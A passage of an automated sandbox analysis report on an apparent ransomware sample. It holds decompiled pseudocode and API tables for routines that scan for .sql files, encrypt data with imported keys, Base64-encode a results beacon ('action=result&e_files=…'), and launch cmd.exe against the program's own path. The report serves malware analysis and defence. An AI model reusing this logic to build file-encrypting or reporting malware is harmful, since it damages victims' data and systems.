                                      								if(_t111 != 0) {
                                      									if(MultiByteToWideChar(0xfde9, 0, _t135, 0xffffffff, _t111, _v8 + 1) <= 0) {
                                      										GetLastError();
                                      									} else {
                                      										 *0x412b00 = _t111;
                                      									}
                                      								}
                                      							}
                                      							VirtualFree(_v36, 0, 0x8000);
                                      						}
                                      						_t33 =  &_v24; // 0x4054e4
                                      						_t133 =  *_t33;
                                      						if(_t133 != 0) {
                                      							_t95 = VirtualAlloc(0, lstrlenA(_t133) + 1, 0x3000, 4);
                                      							 *_v40 = _t95;
                                      							if(_t95 != 0) {
                                      								lstrcpyA(_t95, _t133);
                                      							}
                                      						}
                                      						_t88 = GetProcessHeap;
                                      						if(_t127 != 0) {
                                      							HeapFree(GetProcessHeap(), 0, _t127);
                                      							_t88 = GetProcessHeap;
                                      						}
                                      						if(_t133 != 0) {
                                      							HeapFree( *_t88(), 0, _t133);
                                      						}
                                      						_t129 = _v12;
                                      						L26:
                                      						VirtualFree(_v44, 0, 0x8000);
                                      						return _t129;
                                      					}
                                      				}
                                      			}




















































                                      0x0040505d
                                      0x00405062
                                      0x00405065
                                      0x0040506b
                                      0x00405071
                                      0x00405079
                                      0x0040507c
                                      0x0040507c
                                      0x00405082
                                      0x00405084
                                      0x00405089
                                      0x00405094
                                      0x00405094
                                      0x00405090
                                      0x00405090
                                      0x00405090
                                      0x00405096
                                      0x004050a5
                                      0x004050ab
                                      0x004050ad
                                      0x0040525e
                                      0x00000000
                                      0x004050b3
                                      0x004050b3
                                      0x004050b8
                                      0x004050c0
                                      0x004050c3
                                      0x004050c6
                                      0x004050cc
                                      0x004050d0
                                      0x004050da
                                      0x004050e6
                                      0x004050eb
                                      0x004050f2
                                      0x0040510e
                                      0x0040511c
                                      0x00405124
                                      0x00405127
                                      0x0040512a
                                      0x00405130
                                      0x00405139
                                      0x00405266
                                      0x0040526b
                                      0x0040526c
                                      0x0040526d
                                      0x0040526e
                                      0x0040526f
                                      0x00405276
                                      0x00405277
                                      0x00405278
                                      0x00405287
                                      0x0040528f
                                      0x00405299
                                      0x0040529c
                                      0x004052bb
                                      0x004052bd
                                      0x004052c0
                                      0x004052c3
                                      0x004052d4
                                      0x004052da
                                      0x004052dd
                                      0x004052df
                                      0x004052ea
                                      0x004052f0
                                      0x004052f3
                                      0x004052f5
                                      0x004052f7
                                      0x004052f7
                                      0x004052fb
                                      0x004052fe
                                      0x00405305
                                      0x00405307
                                      0x0040530a
                                      0x00405310
                                      0x00405312
                                      0x00405314
                                      0x00405316
                                      0x00405316
                                      0x00405319
                                      0x00405323
                                      0x0040531b
                                      0x0040531b
                                      0x0040531d
                                      0x0040531e
                                      0x0040531e
                                      0x00405328
                                      0x00405329
                                      0x0040532f
                                      0x00405334
                                      0x00405334
                                      0x00405316
                                      0x0040533b
                                      0x00405341
                                      0x00405344
                                      0x00405344
                                      0x0040534a
                                      0x0040534a
                                      0x00405351
                                      0x00405351
                                      0x0040536b
                                      0x0040513f
                                      0x0040513f
                                      0x00405142
                                      0x0040514b
                                      0x00405152
                                      0x0040515f
                                      0x00405162
                                      0x00405162
                                      0x00405168
                                      0x0040516a
                                      0x0040516f
                                      0x0040517a
                                      0x0040517a
                                      0x00405176
                                      0x00405176
                                      0x00405176
                                      0x00405192
                                      0x004051aa
                                      0x004051ae
                                      0x004051c8
                                      0x004051d2
                                      0x004051ca
                                      0x004051ca
                                      0x004051ca
                                      0x004051c8
                                      0x004051d8
                                      0x004051e8
                                      0x004051e8
                                      0x004051ee
                                      0x004051ee
                                      0x004051f3
                                      0x00405207
                                      0x0040520c
                                      0x00405210
                                      0x00405214
                                      0x00405214
                                      0x00405210
                                      0x00405220
                                      0x00405227
                                      0x0040522f
                                      0x00405231
                                      0x00405231
                                      0x00405238
                                      0x00405240
                                      0x00405240
                                      0x00405242
                                      0x00405245
                                      0x0040524f
                                      0x0040525d
                                      0x0040525d
                                      0x00405139

                                      APIs
                                      • lstrlenA.KERNEL32(?,00000001,?,?), ref: 00405065
                                      • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405082
                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004050A5
                                      • _memset.LIBCMT ref: 004050F2
                                      • lstrlenA.KERNEL32(?), ref: 004050FE
                                      • lstrlenA.KERNEL32(?,00000000), ref: 00405152
                                      • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00405168
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0040518A
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004051A8
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001), ref: 004051C0
                                      • GetLastError.KERNEL32 ref: 004051D2
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004051E8
                                      • lstrlenA.KERNEL32(T@,00003000,00000004,00000000), ref: 004051FD
                                      • VirtualAlloc.KERNEL32(00000000,00000001), ref: 00405207
                                      • lstrcpyA.KERNEL32(00000000,T@), ref: 00405214
                                      • HeapFree.KERNEL32(00000000), ref: 0040522F
                                      • HeapFree.KERNEL32(00000000), ref: 00405240
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040524F
                                      • GetLastError.KERNEL32 ref: 0040525E
                                        • Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
                                        • Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
                                        • Part of subcall function 00404FD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
                                        • Part of subcall function 00404FD0: wsprintfW.USER32 ref: 00405019
                                        • Part of subcall function 00404FD0: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
                                        • Part of subcall function 00404FD0: ExitProcess.KERNEL32 ref: 0040503B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Alloc$Freelstrlen$BinaryCryptErrorHeapLastString$ByteCharExecuteExitFileModuleMultiNameProcessShellWide_memsetlstrcpywsprintf
                                      • String ID: #shasj$T@
                                      • API String ID: 463976167-3786297935
                                      • Opcode ID: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
                                      • Instruction ID: a9872d5510dab6a1258aa89b5c1af8b8eb6182ffb0005660de6a3b244a0720a6
                                      • Opcode Fuzzy Hash: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
                                      • Instruction Fuzzy Hash: 54519471E01215ABEB209BA59D49BAF7BB8EF48710F100065FA05BA2D1DB749D01CFA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004064A0(WCHAR* __ecx) {
                                      				void* _v8;
                                      				void* _v12;
                                      				WCHAR* _v16;
                                      				WCHAR* _v20;
                                      				long _v24;
                                      				struct _WIN32_FIND_DATAW _v620;
                                      				int _t38;
                                      				struct _SECURITY_ATTRIBUTES* _t40;
                                      				int _t50;
                                      				WCHAR* _t52;
                                      				intOrPtr _t53;
                                      				void* _t54;
                                      				WCHAR* _t57;
                                      				long _t64;
                                      				WCHAR* _t66;
                                      				void* _t67;
                                      
                                      				_t66 = __ecx;
                                      				_v16 = __ecx;
                                      				_t52 =  &(_t66[lstrlenW(__ecx)]);
                                      				_v20 = _t52;
                                      				lstrcatW(_t66, "*");
                                      				_v8 = FindFirstFileW(_t66,  &_v620);
                                      				 *_t52 = 0;
                                      				_t53 = 0;
                                      				do {
                                      					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
                                      						goto L20;
                                      					} else {
                                      						lstrcatW(_t66,  &(_v620.cFileName));
                                      						_t38 = lstrlenW(_t66);
                                      						_t10 = _t38 - 1; // -1
                                      						_t57 =  &(_t66[_t10]);
                                      						if(_t38 == 0) {
                                      							L18:
                                      							_t53 = 0;
                                      							goto L19;
                                      						} else {
                                      							while( *_t57 != 0x2e) {
                                      								_t57 = _t57 - 2;
                                      								_t38 = _t38 - 1;
                                      								if(_t38 != 0) {
                                      									continue;
                                      								}
                                      								break;
                                      							}
                                      							if(_t38 == 0) {
                                      								goto L18;
                                      							} else {
                                      								_t40 = lstrcmpW(_t57, L".sql");
                                      								if(_t40 != 0) {
                                      									goto L18;
                                      								} else {
                                      									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
                                      									_t64 = GetFileSize(_t54, 0);
                                      									_v12 = 0;
                                      									if(_t64 < 0x40000000) {
                                      										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
                                      										if(_t67 != 0) {
                                      											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E00407C10(_t67, "*******************") != 0) {
                                      												_t50 = lstrlenA("*******************");
                                      												_t15 = _t67 + 1; // 0x1
                                      												_v12 = E00406440(_t15 + _t50);
                                      											}
                                      											VirtualFree(_t67, 0, 0x8000);
                                      										}
                                      										_t66 = _v16;
                                      									}
                                      									CloseHandle(_t54);
                                      									_t53 = _v12;
                                      									if(_t53 == 0) {
                                      										L19:
                                      										 *_v20 = 0;
                                      										goto L20;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					break;
                                      					L20:
                                      				} while (FindNextFileW(_v8,  &_v620) != 0);
                                      				FindClose(_v8);
                                      				return _t53;
                                      			}



















                                      0x004064ab
                                      0x004064af
                                      0x004064be
                                      0x004064c1
                                      0x004064c4
                                      0x004064de
                                      0x004064e3
                                      0x004064e6
                                      0x004064f0
                                      0x00406500
                                      0x00000000
                                      0x0040651c
                                      0x00406524
                                      0x0040652b
                                      0x00406531
                                      0x00406534
                                      0x00406539
                                      0x00406608
                                      0x00406608
                                      0x00000000
                                      0x00406540
                                      0x00406540
                                      0x00406546
                                      0x00406549
                                      0x0040654a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040654a
                                      0x0040654e
                                      0x00000000
                                      0x00406554
                                      0x0040655a
                                      0x0040655e
                                      0x00000000
                                      0x00406564
                                      0x00406577
                                      0x00406582
                                      0x00406586
                                      0x0040658f
                                      0x004065a0
                                      0x004065a4
                                      0x004065b7
                                      0x004065ce
                                      0x004065d4
                                      0x004065de
                                      0x004065de
                                      0x004065e9
                                      0x004065e9
                                      0x004065ef
                                      0x004065ef
                                      0x004065f3
                                      0x004065f9
                                      0x004065fe
                                      0x0040660a
                                      0x0040660f
                                      0x00000000
                                      0x0040660f
                                      0x004065fe
                                      0x0040655e
                                      0x0040654e
                                      0x00406539
                                      0x00000000
                                      0x00406612
                                      0x00406622
                                      0x0040662d
                                      0x0040663b

                                      APIs
                                      • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
                                      • lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
                                      • lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
                                      • lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
                                      • lstrcatW.KERNEL32(00000000,?), ref: 00406524
                                      • lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
                                      • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF
                                      • lstrlenA.KERNEL32(*******************,?,?), ref: 004065CE
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004065E9
                                      • CloseHandle.KERNEL32(00000000,?,?), ref: 004065F3
                                      • FindNextFileW.KERNEL32(?,?,?,?), ref: 0040661C
                                      • FindClose.KERNEL32(?,?,?), ref: 0040662D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                      • String ID: *******************$.sql
                                      • API String ID: 3616287438-58436570
                                      • Opcode ID: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
                                      • Instruction ID: d8231c9366fa09183c7f9a28845eb84a492a5b8a9a6307543842452b5fb504c9
                                      • Opcode Fuzzy Hash: 05c8e46b5a6b324242753d00ddfa767ad3d4e90b023ac9ffc8302244919f4615
                                      • Instruction Fuzzy Hash: 24419271601219ABEB209B609D48FAB77BCEF44704F11447AF902F6191EB799E50CB6C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 51%
                                      			E00405540(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				BYTE* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				int _v20;
                                      				char _v22;
                                      				short _v24;
                                      				short _v28;
                                      				char _v36;
                                      				char _v180;
                                      				char _v435;
                                      				char _v436;
                                      				WCHAR* _t40;
                                      				signed int _t48;
                                      				int _t60;
                                      				void* _t61;
                                      				char _t68;
                                      				CHAR* _t71;
                                      				void* _t74;
                                      				short _t79;
                                      				short _t80;
                                      				char _t81;
                                      				BYTE* _t84;
                                      				WCHAR* _t92;
                                      				signed int _t93;
                                      				char* _t95;
                                      				void* _t96;
                                      				int _t98;
                                      				long _t99;
                                      				void* _t100;
                                      
                                      				_t74 = __ecx;
                                      				_t96 = __edx;
                                      				_v12 = __ecx;
                                      				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
                                      				_v16 = _t40;
                                      				if(_t40 == 0) {
                                      					_t92 = 0;
                                      					_t71 = 0;
                                      				} else {
                                      					_t3 =  &(_t40[0x400]); // 0x800
                                      					_t71 = _t3;
                                      					_t92 = _t40;
                                      				}
                                      				_push(_t96);
                                      				_v8 = _t92;
                                      				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				_push(0);
                                      				_push(_t74);
                                      				_push(0);
                                      				E004039B0( &_v180);
                                      				E00406D90( &_v180);
                                      				E00406BA0( &_v180);
                                      				E004069A0( &_v180,  &(_t92[lstrlenW(_t92)]));
                                      				_t48 = lstrlenW(_t92);
                                      				_t79 = "#shasj"; // 0x61687323
                                      				_t93 = _t48;
                                      				asm("movq xmm0, [0x410128]");
                                      				_v28 = _t79;
                                      				_t80 =  *0x410134; // 0x6a73
                                      				_v24 = _t80;
                                      				_t81 =  *0x410136; // 0x0
                                      				asm("movq [ebp-0x20], xmm0");
                                      				_v22 = _t81;
                                      				_v436 = 0;
                                      				E00408B30( &_v435, 0, 0xff);
                                      				E00405C40( &_v436,  &_v36, lstrlenA( &_v36));
                                      				_t98 = _t93 + _t93;
                                      				E00405CF0( &_v436, _v8, _t98);
                                      				_v20 = _t93 * 8;
                                      				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
                                      					GetLastError();
                                      				}
                                      				_t29 = lstrlenA(_t71) + 4; // 0x4
                                      				_t99 = _t29;
                                      				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
                                      				_t60 = lstrlenA(_t71);
                                      				_t84 = _v12;
                                      				_t61 = _t60 + 2;
                                      				if(_t84 == 0) {
                                      					L7:
                                      					_v8 = 0;
                                      				} else {
                                      					_v8 = _t84;
                                      					if(_t61 >= _t99) {
                                      						goto L7;
                                      					}
                                      				}
                                      				_t100 = 0;
                                      				if(lstrlenA(_t71) != 0) {
                                      					_t95 = _v8;
                                      					do {
                                      						_t68 =  *((intOrPtr*)(_t100 + _t71));
                                      						if(_t68 != 0xa && _t68 != 0xd) {
                                      							 *_t95 = _t68;
                                      							_t95 = _t95 + 1;
                                      						}
                                      						_t100 = _t100 + 1;
                                      					} while (_t100 < lstrlenA(_t71));
                                      				}
                                      				E00405370(_v8, 0, 0);
                                      				_t73 =  !=  ? 1 : 0;
                                      				VirtualFree(_v12, 0, 0x8000);
                                      				E00407720( &_v180);
                                      				VirtualFree(_v16, 0, 0x8000);
                                      				_t67 =  !=  ? 1 : 0;
                                      				return  !=  ? 1 : 0;
                                      			}
































                                      0x00405540
                                      0x0040555a
                                      0x0040555c
                                      0x0040555f
                                      0x00405565
                                      0x0040556a
                                      0x00405576
                                      0x00405578
                                      0x0040556c
                                      0x0040556c
                                      0x0040556c
                                      0x00405572
                                      0x00405572
                                      0x0040557a
                                      0x0040557e
                                      0x0040558d
                                      0x00405596
                                      0x00405598
                                      0x00405599
                                      0x0040559e
                                      0x004055a0
                                      0x004055a1
                                      0x004055a3
                                      0x004055a4
                                      0x004055a6
                                      0x004055a7
                                      0x004055a9
                                      0x004055aa
                                      0x004055af
                                      0x004055b1
                                      0x004055b2
                                      0x004055ba
                                      0x004055c5
                                      0x004055d0
                                      0x004055e8
                                      0x004055ee
                                      0x004055f0
                                      0x004055f6
                                      0x004055f8
                                      0x00405606
                                      0x00405609
                                      0x00405615
                                      0x00405619
                                      0x00405622
                                      0x00405627
                                      0x0040562a
                                      0x00405631
                                      0x0040564d
                                      0x00405655
                                      0x00405662
                                      0x00405671
                                      0x0040568a
                                      0x0040568c
                                      0x0040568c
                                      0x004056a2
                                      0x004056a2
                                      0x004056af
                                      0x004056b2
                                      0x004056b4
                                      0x004056b7
                                      0x004056bc
                                      0x004056c5
                                      0x004056c5
                                      0x004056be
                                      0x004056be
                                      0x004056c3
                                      0x00000000
                                      0x00000000
                                      0x004056c3
                                      0x004056cd
                                      0x004056d3
                                      0x004056d5
                                      0x004056d8
                                      0x004056d8
                                      0x004056dd
                                      0x004056e3
                                      0x004056e5
                                      0x004056e5
                                      0x004056e7
                                      0x004056ee
                                      0x004056d8
                                      0x004056f9
                                      0x00405713
                                      0x00405720
                                      0x00405728
                                      0x00405737
                                      0x0040573b
                                      0x00405741

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0040555F
                                      • wsprintfW.USER32 ref: 0040558D
                                      • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055DC
                                      • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 004055EE
                                      • _memset.LIBCMT ref: 00405631
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0040563D
                                      • CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 00405682
                                      • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0040568C
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 00405699
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 004056A8
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056B2
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056CF
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 004056E8
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405720
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00405737
                                      Strings
                                      • action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 00405587
                                      • #shasj, xrefs: 004055F0
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
                                      • String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
                                      • API String ID: 2994799111-4131875188
                                      • Opcode ID: 211b1dd28046743099e46c1b0964984f10231aaafabe4b274e23aab69b3c652f
                                      • Instruction ID: 65ff7d96991e722c176764c3897e6b24fa244fe7beac740f882282c65e832afb
                                      • Opcode Fuzzy Hash: 211b1dd28046743099e46c1b0964984f10231aaafabe4b274e23aab69b3c652f
                                      • Instruction Fuzzy Hash: B4519F71A00219AAEB20AB65DD46FEF7B79EF44704F100079E605B62D1DB746E04CFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 54%
                                      			E00406000(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, char _a20) {
                                      				long* _v8;
                                      				long* _v12;
                                      				int _v16;
                                      				char _v20;
                                      				long _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				long** _t26;
                                      				char* _t31;
                                      				int _t33;
                                      				long _t36;
                                      
                                      				EnterCriticalSection(0x412ae8);
                                      				_v8 = 0;
                                      				_v12 = 0;
                                      				_t26 =  &_v8;
                                      				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                      				if(_t26 != 0) {
                                      					L6:
                                      					_v16 = 0;
                                      					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
                                      						_v20 = 0xa;
                                      						_t31 =  &_v20;
                                      						_t12 =  &_v28; // 0x403724
                                      						__imp__CryptGetKeyParam(_v12, 8, _t12, _t31, 0);
                                      						_v32 = _t31;
                                      						 *_a16 = 0xc8;
                                      						_t16 =  &_a20; // 0x403724
                                      						_t33 = _a12;
                                      						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16,  *_t16);
                                      						_v16 = _t33;
                                      						_v24 = GetLastError();
                                      						if(_v16 == 0) {
                                      							E004034F0(_t34);
                                      						}
                                      					}
                                      					CryptReleaseContext(_v8, 0);
                                      					LeaveCriticalSection(0x412ae8);
                                      					return _v16;
                                      				}
                                      				_t36 = GetLastError();
                                      				if(_t36 != 0x80090016) {
                                      					return 0;
                                      				}
                                      				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                      				if(_t36 != 0) {
                                      					goto L6;
                                      				}
                                      				return 0;
                                      			}














                                      0x0040600b
                                      0x00406011
                                      0x00406018
                                      0x0040602a
                                      0x0040602e
                                      0x00406036
                                      0x0040606e
                                      0x0040606e
                                      0x00406091
                                      0x00406093
                                      0x0040609c
                                      0x004060a0
                                      0x004060aa
                                      0x004060b0
                                      0x004060b6
                                      0x004060bc
                                      0x004060c4
                                      0x004060d2
                                      0x004060d8
                                      0x004060e1
                                      0x004060e8
                                      0x004060ed
                                      0x004060ed
                                      0x004060e8
                                      0x004060f8
                                      0x00406103
                                      0x00000000
                                      0x00406109
                                      0x00406038
                                      0x00406043
                                      0x00000000
                                      0x00406067
                                      0x00406054
                                      0x0040605c
                                      0x00000000
                                      0x00406065
                                      0x00000000

                                      APIs
                                      • EnterCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000,00000000,?,00000800), ref: 0040600B
                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,00403724,00000000,00000000,00000000), ref: 0040602E
                                      • GetLastError.KERNEL32(?,00403724,00000000,00000000,00000000), ref: 00406038
                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00403724,00000000,00000000,00000000), ref: 00406054
                                      • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00403724,00000000,00000000), ref: 00406089
                                      • CryptGetKeyParam.ADVAPI32(00000000,00000008,$7@,0000000A,00000000,?,00403724,00000000), ref: 004060AA
                                      • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,$7@,?,00403724,00000000), ref: 004060D2
                                      • GetLastError.KERNEL32(?,00403724,00000000), ref: 004060DB
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00403724,00000000,00000000), ref: 004060F8
                                      • LeaveCriticalSection.KERNEL32(00412AE8,?,00403724,00000000,00000000), ref: 00406103
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                      • String ID: $7@$$7@$Microsoft Enhanced Cryptographic Provider v1.0
                                      • API String ID: 72144047-2376705498
                                      • Opcode ID: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
                                      • Instruction ID: f2ae4c90db2c5b8a25dd032e9c4ad046e7fd1e3aad681ca681e37570fcd3149a
                                      • Opcode Fuzzy Hash: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
                                      • Instruction Fuzzy Hash: 84314F74A40308BFDB10CFA0DD45FAF77B8AB48700F108029F602BA2D0D7B99A50DB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 66%
                                      			E00407C60(intOrPtr __ecx, void* __edx) {
                                      				long* _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v34;
                                      				short _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				char _v48;
                                      				long** _t37;
                                      				struct HINSTANCE__* _t45;
                                      				_Unknown_base(*)()* _t46;
                                      				signed int _t54;
                                      				long _t55;
                                      				intOrPtr _t56;
                                      				signed int _t58;
                                      				signed int _t60;
                                      				void* _t63;
                                      				void* _t64;
                                      				void* _t65;
                                      
                                      				_t54 = 0;
                                      				_v12 = __ecx;
                                      				_t37 =  &_v8;
                                      				_t63 = __edx;
                                      				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
                                      				if(_t37 == 0) {
                                      					L15:
                                      					return _t54;
                                      				} else {
                                      					_t58 = 0;
                                      					do {
                                      						_t3 = _t58 + 0x61; // 0x61
                                      						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
                                      						_t58 = _t58 + 1;
                                      					} while (_t58 < 0x1a);
                                      					_t7 = _t63 + 1; // 0x1
                                      					_t55 = _t7;
